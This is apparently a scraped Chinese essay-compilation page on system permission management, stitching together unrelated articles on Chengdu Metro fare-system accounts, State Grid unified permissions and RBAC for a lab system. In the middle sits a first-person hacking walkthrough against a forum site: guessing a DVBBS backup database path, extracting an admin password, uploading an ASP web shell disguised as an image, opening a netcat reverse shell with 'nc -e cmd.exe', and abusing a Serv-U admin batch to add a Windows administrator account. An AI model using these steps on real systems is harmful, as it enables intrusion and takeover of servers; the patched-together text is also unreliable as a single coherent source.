为了便于区分操作员, AFC系统管理员并未将员工号直接作为AFC正式账号名, 而是采用了部门编码 (或权限组编码) +员工号尾数的方式来命名。AFC正式账号由6位数字组成, 第1位数字代表部门或权限组, 剩余5位数字为成都地铁运营有限公司员工编号后5位数。其中, 票务中心以1、2开头, 区分硬件维护类、应用软件类权限组;AFC系统维保商以3开头;车务中心以5、6、7、8开头, 分别代表站务员、值班员、值班站长、中心站站长4个权限组;安全部以9开头, 代表票务稽查权限组。
之所以要用不同数字来区分部门或权限组, 是因为车站客运服务人员、AFC设备维修人员数量巨大, 有数百人之多, 这样命名, 一旦将来出现票务问题, 就可以快速判断出其所属权限组, 有利于定位问题。事实证明, 这样的命名规则确实方便了TVM差异账、BOM长短款等票务问题的追踪和分析, 起到了很好的实际效果。
2.5 提供测试用户账号
成都地铁作为全国轨道交通行业的一员新兵, 一切都是从头起步, 有相当数量的客运人员、维修工人虽然具有相关行业背景, 但毕竟没有在地铁行业工作过, 需要加强业务培训, 对地铁运营逐步了解、熟悉。
为了让一线工作人员尽快熟悉AFC系统, 系统管理员生成了多个分属不同权限组的测试用户账号, 提供给车站客运服务人员、AFC设备维修人员等相关操作人员在空转模拟运行过程中使用。在成都地铁一号线开通前的半年时间中, 地铁各部门人员通过参与AFC系统紧张的设备调试、测试、演练, 结合自己的岗位逐步熟悉了AFC系统的软硬件设备运作。
2.6 生成正式用户账号
在使用AFC测试用户账号的同时, 地铁各部门人员抓紧运营开通前的宝贵时间, 合理调配人员, 对操作人员做了定岗、定站。之后, 根据AFC系统管理员提供的《AFC正式账号申请表 (模板) 》, 向票务中心提交了经部门领导审核批准的操作员信息, 每条信息包括员工号、权限组、所属车站 (或车站的集合) 、附属选项等。
AFC系统管理员根据申请表, 在线路中央数据库中添加了数百个AFC正式账号, 并将这些账号与指定的权限组、车站或系统关联。之后在线路中央运营管理系统中作权限参数定版, 并将最新的权限参数版本下发到AFC系统的所有终端设备, 告知其各操作员的权限范围。终端设备收到新权限参数后, 自动解析报文, 并据此判断操作员是否有操作权限。
2.7 用户账号启用
设置用户密码是用户登陆AFC系统时身份合法性认证的重要手段。通过技术手段和管理制度相结合, 规定新用户第1次登录系统后必须修改初始密码, 并做到定期更换新密码。AFC系统仅允许用户进行最多3次登录尝试, 如果连续3次登录均失败, 该用户账号将被自动冻结, 直至被系统管理员重新激活。
2.8 用户账号泄露的处理
针对用户账号泄露, AFC系统管理员主要通过制度规定和完善的事后补救措施来尽可能地减少损失。若发现用户账号发生密码泄露, 则要求AFC系统用户立即报告票务中心, 由系统管理员及时采取措施停用该用户账号。如果是涉及到财务系统或中央级的重要用户账号, AFC系统管理员须在24 h内核查系统内数据和系统运行情况, 采取有效补救措施将危害程度降至最低, 同时向相关部门提交书面报告, 说明详细情况。安全部根据有关规定, 对引发AFC系统中数据信息或系统运行安全事故的责任人提出处罚意见, 报安委会审批。
3 结语
本文梳理了成都地铁1号线AFC系统用户权限管理的方方面面。概括来说, 用户权限管理就像是一把锁, 劣质的管理就好比上了一把不用钥匙的锁, 人人都可以窥探你的隐私。对于如何保障个人和公司权益, 答案是2方面的:作为普通用户, 不要把你的账号和密码告诉别人;作为系统管理员, 要实行严格的账号管理。
笔者抛砖引玉, 仅为建立全方位的地铁安全防范体系提供部分借鉴和参考, 希望能有更多的人参与到用户权限管理的讨论中来, 共同提升AFC系统运行的安全性、稳定性, 更好地为广大市民服务。
摘要:对AFC系统用户权限管理进行了概述, 梳理了成都地铁1号线AFC系统用户权限管理的方方面面, 以期为建立全方位的地铁安全防范体系提供借鉴和参考。
关键词:地铁,自动售检票系统,用户权限管理
参考文献
[1]王国光.自动售检票系统及关键技术研究.铁道部科学研究院, 2005
9.bss系统权限管理规范 篇九
随着电力企业信息化建设的不断推进, 国家电网公司总部及各网省电力公司的信息化水平不断提升。当前, 各网省电力公司已建设了众多的业务应用系统, 且这些业务系统是由不同开发商在不同时期采用不同技术建设的, 如生产管理系统、财务管控系统、协同办公系统、营销系统、企业门户系统、ERP系统、GIS系统等。在这些应用系统中, 大多数都有自成一体的用户管理、授权及认证系统, 同一用户在进入不同的应用系统时需要使用不同账号访问, 这种操作方式不仅为用户的使用带来许多不便, 同时也降低了电力企业业务系统身份信息的可管理性和安全性[1]。
统一权限管理系统的应用可以实现对各业务系统权限的统一管理, 建立统一的权限管理规范, 提升系统授权的管控能力和业务系统身份信息安全的主动防御能力。
1 统一权限管理系统建设思路探讨
1.1 电力企业信息系统权限管理存在的问题
随着电力企业信息化建设不断推进, 各业务系统的应用也不断推广和深入, 已经逐步渗透到企业的每一个业务流程。这些系统在很大程度上提高了电力企业的办公效率, 但是由于在建设时忽视了不同应用系统之间的信息共享与融合, 每个业务系统都有各自的权限管理体系, 随着越来越多业务系统的建设, 很多管理问题突显出来。同一个用户在访问不同系统时要使用不同的用户名和密码, 对用户使用这些系统造成了许多不便, 虽然可以在不同系统中使用相同的用户名和密码来消除这种不便, 但却大大降低了系统的安全性, 而且用户在每个系统中都有相应的权限, 而这些系统都有自成体系的用户权限管理机制, 管理员在权限管理时所使用的界面各不相同, 加大了权限管理的成本[2]。
1.2 统一权限管理系统解决方案
从业务需求和用户需求的角度出发, 采用总结问题、分析问题、解决问题的方法论, 针对电力企业应用系统权限管理问题调研的统计及分析结果, 提出统一权限管理系统解决方案:通过建设统一权限管理平台, 统一各业务系统的权限模型, 实现业务应用权限的集中管理, 提升一体化平台柔性架构以及应用融合能力, 促进公司信息资源更大范围的集成共享;通过构建一体化平台权限组件基础公共服务, 为应用系统提供统一的身份授权、权限对象管理、认证、身份管理等服务, 通过统一权限控制提升一体化平台的承载能力;通过建立统一的权限管理规范, 加强内部操作风险管控, 降低系统的管理复杂度, 降低系统管理风险, 提升系统授权的管控能力;建立统一的权限分配与回收管理流程, 对用户在各应用系统的权限分配进行集中监控;通过建立统一的权限审计, 对用户权限进行综合分析, 提升应用系统信息安全的主动防御能力[3]。
统一权限管理系统解决方案具体内容如下。
1) 促进一体化平台柔性架构以及应用融合, 通过权限的集中管理为信息资源更大范围的集成共享提供支撑。主要内容包括:通过建设统一权限平台, 建立符合现状的统一权限模型, 实现业务应用权限的集中式统一管理;通过统一权限平台的建设, 实现跨系统、跨区域、跨组织的权限管理, 为应用系统业务流程整合提供标准规范的权限数据支撑;通过统一权限平台的建设, 为应用系统提供一致的身份权限信息及组织机构信息;通过统一权限平台的建设, 解决现有应用系统组织差异引发的问题, 为应用系统间横向集成提供标准规范的组织数据支撑, 为“五大”适应性调整中的组织权限调整提供全面监控、检查的支撑能力。
2) 构建一体化平台权限组件基础公共服务, 通过统一权限控制提升一体化平台的承载能力。内容包括:通过权限平台的建设, 为应用系统提供统一的身份授权、权限对象管理、认证、身份管理等服务;建成内部一致的、以用户账号为唯一标识的用户基本信息、关系信息、权限信息等的单一用户视图;强化用户权限管理, 实现全系统用户身份权限信息的集中管理, 建立面向全体用户的权限控制中心。
3) 提升信息系统身份权限管控能力, 通过权限风险分析提升应用系统信息安全的主动防御能力。内容包括:通过建立统一的权限管理规范, 加强内部操作风险管控, 降低系统管理复杂度, 降低系统管理风险, 提升系统授权的管控能力;通过建立统一的权限分配与回收管理流程, 对用户在各应用系统中的权限分配进行集中监控;通过建立统一的权限审计, 对用户权限进行综合分析, 提升应用系统信息安全的主动防御能力。
2 统一权限管理系统实施方案
2.1 系统建设整体策略
统一权限管理平台是一体化平台的重要组成部分, 国家电网公司已建和未来建设的信息系统都将与其进行集成。统一权限平台的实施涉及面广、复杂度高, 要保证系统的成功实施, 需要项目单位与实施项目组紧密合作, 采取如下实施策略, 保障项目的顺利开展。
1) 采取“整体规划、分步实施、稳步推进”的总体实施策略。基于国家电网公司统一权限试点实施指导意见和统一权限整体设计方案, 以统一权限建设总体目标为指导, 结合项目单位实际情况, 充分考虑可能存在的风险, 科学合理地规划项目实施路线, 建立合理完整、切实可行的业务系统权限集成策略, 分步开展业务系统权限集成工作, 稳步推进统一权限平台在项目单位的应用[4]。
2) 采取“统一规划、统一标准、统一组织”的过程策略。统一权限项目是典型的集成类项目, 涉及公司所有信息系统的权限管理整合, 在项目建设与实施过程中, 必须坚持国家电网公司“统一规划、统一标准、统一组织”的原则, 项目实施单位信息负责项目的主要管理工作, 各研发厂商与相关业务部门应主动参与、积极配合, 有效整合资源, 突出重点, 在项目建设“保质有序”的同时, 完成国家电网公司统一权限试点建设计划的要求。
3) 采取“明确权责、风险控制、团结协作”的管控策略。鉴于实施统一权限管理系统会触及企业诸多业务系统长期形成的权限管理定势, 冲击一些权限管理模式, 这些因素会在实施过程中形成各种阻力, 导致项目推进滞缓, 项目人力成本剧增, 项目风险加大。因此, 必须建立严格的项目会议制度、管理制度和工作规范, 执行权责分明、合理高效的管控措施, 以保障统一权限管理系统的顺利实施。
2.2 总体架构
统一权限管理系统作为企业的基础信息平台系统, 与企业中的企业门户、目录服务身份管理、数据中心、目录服务访问网关 (Access Gateway) 、业务应用系统具有集成关系。统一权限管理系统总体架构如图1所示。
1) 目录服务集成。与目录服务系统集成主要采用数据集成方式, 集成内容主要包括身份数据和组织数据。
2) ERP HR集成。与ERP HR集成主要基于数据中心的集成方式, 其集成内容包括人员、组织、岗位及人岗关系等数据。
3) 业务应用系统集成。与业务应用系统集成主要有数据同步集成和系统服务集成2种方式, 对已建业务应用系统采用数据集成方式, 对新建业务应用系统采用系统服务集成方式。数据同步集成方式主要基于“业务应用适配器”与业务应用系统进行数据同步集成, 数据的同步方向为单向, 以统一权限管理平台数据为数据源, 对各集成业务应用系统进行数据同步;系统服务集成方式为业务应用系统提供身份、组织、权限数据的供应及维护功能, 以及为业务应用系统提供权限验证等服务。
4) Access Gateway集成。与Access Gateway集成主要是指统一权限管理系统中的统一认证模块需要与Access Gateway进行单点登录集成。
5) 企业门户集成。企业门户集成主要包括为门户提供统一展现所需要的业务应用数据, 以及与门户完成权限相关的数据集成。
2.3 业务功能设计
依照国家电网公司统一权限管理平台设计成果《国家电网公司统一权限平台概要设计》, 考虑电力企业系统建设实际需求, 统一权限平台实施需要实现的业务及功能[5]包括:身份管理及相应接口服务、授权管理及相应接口服务、组织管理及相应接口服务、角色管理及相应接口服务、资源及相应接口服务、数据同步适配器、统一菜单管理、统一主界面管理等。统一权限管理系统功能与集成关系示意如图2所示。
2.4 系统物理部署架构
统一权限管理系统部署架构拓扑分为生产区与开发测试培训区2个大区, 生产区与开发测试培训区通过公司内部骨干网络进行数据交互, 采用内网防火墙进行隔离[5]。生产区用于部署系统生产环境, 对系统网络可靠性要求高, 主要负责管理服务及数据服务部署, 对可靠性要求高的应用和接口服务, 采用高可用、负载均衡、业务数据读写存储方式;开发测试培训区用于完成系统功能开发、功能测试及培训工作使用。统一权限管理系统物理部署架构如图3所示。
3 统一权限管理系统应用
根据国家电网公司“十二五”信息化规划中针对SG186阶段建设的差距与不足, 其中的7项可以通过统一权限管理系统的建设得到一定程度的提升, 具体为:
1) 通过权限的集中管理, 使信息资源形成更大范围的集成共享;
2) 为业务功能的组件化管理提供权限服务支撑;
3) 构建柔性化权限管理组件及基础服务, 提升一体化平台承载能力;
4) 建立权限规则库, 提高业务应用及分析决策能力;
5) 通过权限风险分析, 提升信息安全主动防御能力;
6) 对在机构调整、业务重组时发生的人员、组织、权限的变化, 提供快速、柔性的调整能力;
7) 通过对业务应用权限的分配以及用户操作行为进行集中审计分析, 提升信息运维和管控能力。
在智能电网和SG-ERP建设阶段, 要进一步深化目录服务建设, 完善目录服务管理规范。在SG186目录服务的建设成果的基础上, 对企业范围内各种受控资源的访问权限进行统一建模, 建立统一的企业标准角色库, 将各种应用的受控资源的权限纳入到企业标准角色库管理, 实现对业务应用权限的集中管理, 实现对人员身份权限集中监控与审计分析, 提升对全网范围内组织、人员、账号、权限的管理能力, 进一步提升一体化平台目录服务的建设价值[6]。
4 结语
随着电力企业信息化建设的不断推进, 各业务系统的应用也不断深化, 通过建设统一权限管理系统, 实现了业务系统权限的统一管理, 提升信息系统快速响应业务调整的适应能力, 同时通过建立统一的权限管理规范, 提升系统授权的管控能力和业务系统身份信息安全的主动防御能力。
参考文献
[1]国家电网公司.企业内部控制管理规范[R].2008.
[2]国家电网公司.国家电网公司十二五信息化规划[R].2012.
[3]国家电网公司.关于开展统一权限平台试点应用实施的通知[R].2012.
[4]国家电网公司.关于征求国家电网公司信息系统统一权限平台管理办法意见的通知[R].2012.
[5]国家电网公司.关于征求国家电网公司统一权限2.0系统需求规格说明书意见的通知[R].2013.
10.bss系统权限管理规范 篇十
今天终于GK完了
无聊闲逛在网上,意识催魂试的找我要文章...
哈~发现一迷信网站,不爽...
(入侵需要理由吗?不需要吗?需要吗?....)用
telnet www.xxx.com 80get enterHTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 11:56:00 GMT
Content-Type: text/html
Content-Length: 87Error
失去了跟主机的连接,F:Documents and Settingslu桌面>看到没,获得很多有用的信息哦先去WEB上看看有没有什么漏洞哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!
没办法,试试!www.xxxx.com/bbs/databackup/20050406.mdb
www.xxxx.com/bbs/databackup/20050407.mdb
www.xxxx.com/bbs/databackup/20050408.mdb
.....
晕..到32了还没出来
管理员不是白痴哦!
www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白痴谁是!
跳出了可爱的下载对话框!downloading.... 完成!用辅臣数据库浏览器打开,选择Dv_Log(2586)
字段名选择l_content 关键字添password2点查询
许多信息出来了哦!
经过筛选
发现一条:
ldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更 新哈,想到什么了?登陆啊,不过用户名不知道,是葛飞吗~开玩笑,那简单,其实转化这个我用他本身的页面,
在登陆页面上用户名和密码乱添
点登陆
www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息填写登录信息这句话意思是“填写登录信息”那么就把填写登录信息换成叼防!提交!看到了吧!用户名是“叼防”
晕!
什么名字啊!不管了,登陆!
成功!呵呵~把老兵的asp站长助手另存为admin_system321.gif上传!晕!一流信息监控系统提醒您:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:drop table换海阳top的传,在晕...还是被拦截!不行!我就不信上不去!
<%if err then%>
<%
end if %>
<%On Error Resume Next
if request(“cmdx”)=“cmd.exe” then
response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall
end if
response.write oScriptlhn.exec(request(“cmdx”)&“ /c”&request(“cmd”)).stdout.readall
%>
保存成为cmd.gif
上传成功!
登陆后台用数据库管理还原成根目录下的admin_system321.asp_system321.asp“>www.xxx.com/bbs/admin_system321.asp登陆,啊...CMD窗口那里显示无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用,
--------------------------------------------------------------------------------请尝试以下操作:确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS)--------------------------------------------------------------------------------技术信息(为技术支持人员提供)转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 把我的SYSTEM32下的CMD.exe用记事本打开,另存为111.gif上传!
在用刚才的方法备分成跟目录下的cmd.exe把刚才cmd.gif里cmd.exe改成他的绝对路径全都上传!然后备分!
访问_system321.asp”>www.xxx.com/bbs/admin_system321.asp
哈!成功!
在用上面的方法把nc传上去!
本地命令提示符执行 nc -vv -l -p 9999
在webshell里执行nc.exe -e cmd.exe 自己IP 9999
NC监听的窗口就出现一个可爱的SHELL在写个文件如下echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt“^”符号的作用相信大家都了解吧!我不罗嗦了。把上面批处理保存为1.txt在SHELL中用NC提交nc 127.0.0.1 43958 <1.txt回显发现220 Domain settings saved
200-User=test1
200 User settings saved成功了!成功添加了用户tyrant密码19851011登陆对方的ftp
转到system32文件夹下quote site exec “net.exe user tyrant 19851011 /add”quote site exec “net.exe localgroup administrators tyrant /add”quote site exec “net.exe user start telnet”用tyrant管理员telnet上去
11.bss系统权限管理规范 篇十一
近几年来,随着高等教育的迅猛发展,高校的实验室管理工作也越来越受到重视,由于实验室管理系统涉及的人员多、信息量大,管理的过程及操作复杂,例如管理员要实现对实验课程的管理、对实验室的管理、对实验项目的管理和对任课老师以及学生的管理等功能,因此为了保证系统的数据安全,必须严格区分各用户对系统访问的功能和权限。
传统访问控制模型主要包括两类:1)自主访问控制模型DAC(Discretionary Access Control),在此模型中,一个特定的客体被模型授权后就可以访问系统中的资源,但是其他没有授权的客体也可以间接甚至间接的对系统中的资源进行访问。因为容易出现权限泄漏的问题。 2 ) 强制访问控制模型MAC(Mandatory Access Control),MAC就是把主体和客体进行分类,根据系统中主题和客体所处的不同级别,让某一级别的主体只能固定的访问某一级别的客体,主体之间不存在相互授权的关系。且MAC中信息的流向是单向的,不可逆的。但是在MAC具体的实现和应用的过程中所需的工作量较大,权限的修改相当麻烦。这些缺陷使得传统的访问控制模型难以满足信息化系统的广泛应用。
为了满足日渐成熟的信息化系统的权限管理,我们引进了RBAC(Role-Based Access Control, RBAC权限管理模式,通过建立用户表、角色表、权限表等方法,配合适当的存储过程使用,较好的解决了该系统在操作权限管理上的问题,极大的方便了开发人员对系统功能的管理和扩展,也方便了管理员对各级用户权限的动态配置[1]。即通过RBAC的授权,可以完成“谁(Who)对什么(What)进行怎样(How)的操作”的限定。
1 RBAC模型
在RBAC之中,包含用户users(USERS)、角色r o l e s ( R O L E S ) 、 目标o b j e c t s ( O B S ) 、 操作operations(OPS)、许可权permissions(PRMS)五个基本数据元素,权限被赋予角色,而不是用户,当一个角色被指定给一个用户时,此用户就拥有了该角色所包含的权限。会话sessions是用户与激活的角色集合之间的映射。RBAC的模型如下图1所示[2]。
2 实验室管理系统中的权限管理
实验室管理系统是针对传统的实验室管理费时费力的缺点而提出的一种新型的智能化管理系统,它的主要功能在于对实验项目的管理、学生的登记预约、统计查询等,且可以根据学生平时的表现对实验成绩进行管理。它充分的利用了学校实验室的有效资源,有效的提高了实验室教学资源的利用率。
在此管理系统中,从功能模块的角度分析主要分为三大模块:管理员模块、任课教师模块和学生模块。各模块根据设置的角色和权限不同,呈现的界面也会不一样。管理员模块的使用者是系统的管理人,他通过系统登记和系统调整等子模块来完成系统的日常管理工作。主要包括实验课程的安排、实验项目的编排和实验室设备以及参加实验人员的查询与统计等[3]。任课教师模块的作用是任课老师可以通过此模块进行实验项目的批次确认和取消、课表查询、考勤登记、报告批阅和成绩统计等功能。而学生模块则是针对参加实验的学生,它实现了从学生签到、浏览实验安排、实验预约和预习、查看实验指导到查看实验成绩等功能。
针对各模块的功能不同,权限管理在实验室管理系统中的作用尤为突出。它的最终目的是建立用户和功能之间的对应关系,从而保证数据的安全性和保密性,就是保证每个用户只能执行他能够执行的操作[4]。角色对权限的操作则是根据实验室管理系统中不同模块的需求而制定的。
在实验室管理系统中选用RBAC模型具有以下几个优点:1)用户和角色层次可以很简单的把实验室管理的结构映射到信息系统中,更加直观且易于使用,同时约束概念的使用使得角色更有层次感。2)权限初始设置好以后,不需要做大的调整。角色对权限是一对多的关系,角色的变动并不会影响到权限控制机制。3)RBAC具有权限委托机制,更有灵活性,使得管理起来更加方便有效,当某个角色处于离岗状态时,可将角色所属的权限授权给另一个角色[5]。例如:当管理员有事不能进行权限管理时,可将一部分权限临时委托给另一人进行权限的操作。只需要简单的将系统中的某个角色分配给其他用户,就可以实现权限的委托授权,而不需要其他的多余操作来实现,操作极其方便。
3 权限管理的设计
3.1 相关数据表的设计
在系统的权限管理设计中,我们利用三个实体表[6]和两个关系表共五个表格来实现权限管理的模型。它们分别是用户表(user)、角色表(role)、权限表(privilege)、用户角色表(role_user)、角色权限表(access),用户和权限之间不能直接联系,而是增加一个用户角色表,角色与用户和权限之间也没有直接联系,用户与角色之间通过用户角色表相联系,这样使得用户和角色的增加与维护变得相对独立,用户与角色之间也建立了动态的对应关系。每个用户对应一个角色,每个角色有多个权限,每个权限都存在于权限表中。这些表的结构如表1-表5所示。
在权限管理中,先选定角色信息再进行相应的功能操作。管理员级别的用户拥有操作所有信息的权限,而任课教师和学生只拥有能操作自己信息的权限。当用户在经过登陆验证后,会先访问“用户表”,根据用户id从用户角色表中找到其对应的角色id,再根据角色id在“角色权限表”中读出相应的权限id,最后进入到“权限表”中读出相应的权限描述以及找出对应的功能模块并生成对应的目标网页。在实现时,采用Session机制,用户登录后得到的功能权限保存在Session中,读出Session中的用户信息后,就可以访问目标网页了。
3.2 模型采用的框架
系统采用MVC(Model View Controller)架构模式设计[7],即按模型、视图、控制器的方式来实现程序的分层管理,对应到编码上即为表现层、业务层和数据层。表现层包含了模板的视图、用户界面、Flash等,不同的用户在表现层显示出不同的功能。业务层包含业务接口层、业务逻辑层、实体层和数据访问层,Action[8]控制器作为业务接口层,提供系统各种业务操作的入口,而业务逻辑层则作为用户访问控制的关键层,负责处理表述层提交的请求,它从数据层、XML配置文件中读取用户的权限数据,通过计算处理、整合、传递到表现层,按照业务逻辑层的请求读取数据。数据层支持大多数数据库,这里我们采用的是My SQL数据库[9],配合着Think PHP框架[10],来实现系统的权限管理。而系统实现的关键技术即CURD技术,它代表创建(Create)、更新(Update)、读取(Read)和删除(Delete)操作,CURD[11]定义了用于处理数据的基本原子操作,但并非一定是create、update、read和delete字样,在Think PHP中则是用add、save、select和delete方法表示模型的CURD操作[12]。
3.3 存储过程的编写
存储过程(即Create)是一组为了完成特定功能的汇编语句集,一个设计良好的数据库都应该有用户存储过程,在系统数据库设计过程中,对三个实体表和两个关系表编写了相应的存储过程,利用PHP语句把他们写入到数据库当中,并编写了相应的权限认证语句。表格的主要写入代码如下(以用户表和角色表为例):
这样我们就把表格写入到了我们的数据库中了,后台中的权限设置模块负责往表里添加数据,当用户登录时会产生一个存有用户数据信息的Session数组,当用户要进行权限操作时就要调用相应权限所在的一类和方法,通过和Session的数据进行对比来判断用户是否具有相应的权限。
3.4 权限认证流程
3.4.1 权限检测
RBAC权限模型的所有权限信息都保存在数据库中, 因此要获取某个用户的权限信息, 需要利用数据库内的数据进行计算。我们用于检测用户权限的方法就证auth Id,来查找与之关联的角色,以及角色所拥有的节点访问权限列表。
3.4.2 登录认证
当用户登录时,会先通过check Login()的方法检测登录,然后系统后台会调用check Access()语句来检测当前模块和操作是否需要认证,如果项目要求认证并且当前模块需要认证,需进行权限认证,认证成功则会反馈成功的字样,认证失败则反馈认证失败需进行重新认证。
3.4.3 权限获取
我们以数据库的方式权限数据,当用户经过登录验证、模块认证后再读取项目的权限模块,判断是否存在公共模块的权限,然后依次读取模块的操作权限并和公共模块的权限合并。
3.4.4 权限访问
权限的访问即模块所属的访问权限的读取,在得到了访问权限列表以后,我们用array()来创建一个关联数组,再通过query()语句就可以根据权限ID来读取对应的权限记录来实现权限的配置。读取的主要代码如下:
我们把写好的代码封装成一类,放在我们的开发目录下,并导入我们的数据库,当用户登录需要访问权限时系统就会调用这一部分语句进行权限验证。
结语
【bss系统权限管理规范】推荐阅读:
系统权限管理项目问题08-30
信息系统操作权限分级管理规定07-05
军队行业数据权限管理07-19
用户和权限管理制度07-25
人事审批权限管理办法07-31
邢台市开发区工作职责和管理权限07-11
出纳工作权限08-18
车间组长职责与权限07-09
人员岗位职责权限07-25
商务部职责权限09-07